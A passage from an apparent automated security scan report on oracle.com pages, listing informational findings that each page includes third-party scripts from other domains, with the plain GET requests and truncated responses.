<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.227. http://www.oracle.com/technetwork/topics/soa/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/soa/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/soa/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41151892412556860,0:1)
Date: Tue, 06 Sep 2011 16:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.228. http://www.oracle.com/technetwork/topics/virtualization/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/virtualization/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=245;ecid=41070124825176468,0:1)
Date: Tue, 06 Sep 2011 16:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.229. http://www.oracle.com/us/ciocentral/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/ciocentral/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js

Request

Response

20.230. http://www.oracle.com/us/community/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/community/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/community/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41183490487442251,0:1)
Date: Tue, 06 Sep 2011 16:16:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.231. http://www.oracle.com/us/corporate/Acquisitions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/Acquisitions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/Acquisitions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35759105706347886,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.232. http://www.oracle.com/us/corporate/analystrelations/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/analystrelations/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/analystrelations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.233. http://www.oracle.com/us/corporate/blogs/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/blogs/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/blogs/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41091191640088127,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.234. http://www.oracle.com/us/corporate/careers/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/careers/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/careers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=237;ecid=41098660587310801,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.235. http://www.oracle.com/us/corporate/citizenship/community/038108.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/citizenship/community/038108.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/citizenship/community/038108.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099369257948753,0:1)
Date: Tue, 06 Sep 2011 16:15:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.236. http://www.oracle.com/us/corporate/citizenship/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/citizenship/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/citizenship/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41181377363497473,0:1)
Date: Tue, 06 Sep 2011 16:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.237. http://www.oracle.com/us/corporate/customers/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/customers/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/customers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=5;ecid=41109874747082182,0:1)
Date: Tue, 06 Sep 2011 16:13:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.238. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/customers/oracle-users-groups-192206.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/customers/oracle-users-groups-192206.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=65;ecid=41091264654533117,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.239. http://www.oracle.com/us/corporate/features/engineered-173370.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/features/engineered-173370.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/features/engineered-173370.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099957668475831,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.240. http://www.oracle.com/us/corporate/history/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/history/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/history/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008810809975844,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.241. http://www.oracle.com/us/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35651503889036777,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.242. http://www.oracle.com/us/corporate/innovation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/innovation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/innovation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099579711348325,0:1)
Date: Tue, 06 Sep 2011 16:15:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.243. http://www.oracle.com/us/corporate/insight/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/insight/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/insight/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008621831412329,0:1)
Date: Tue, 06 Sep 2011 16:15:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.244. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/investor-relations/corporate-governance-176724.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/investor-relations/corporate-governance-176724.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099094380038254,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.245. http://www.oracle.com/us/corporate/investor-relations/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/investor-relations/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/investor-relations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41098991300821785,0:1)
Date: Tue, 06 Sep 2011 16:15:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.246. http://www.oracle.com/us/corporate/oracle-racing-070515.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/oracle-racing-070515.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/oracle-racing-070515.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008999788539688,0:1)
Date: Tue, 06 Sep 2011 16:15:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.247. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/BoardofDirectors/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/press/BoardofDirectors/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35660476075859156,0:1)
Date: Tue, 06 Sep 2011 16:13:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.248. http://www.oracle.com/us/corporate/press/Executives/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
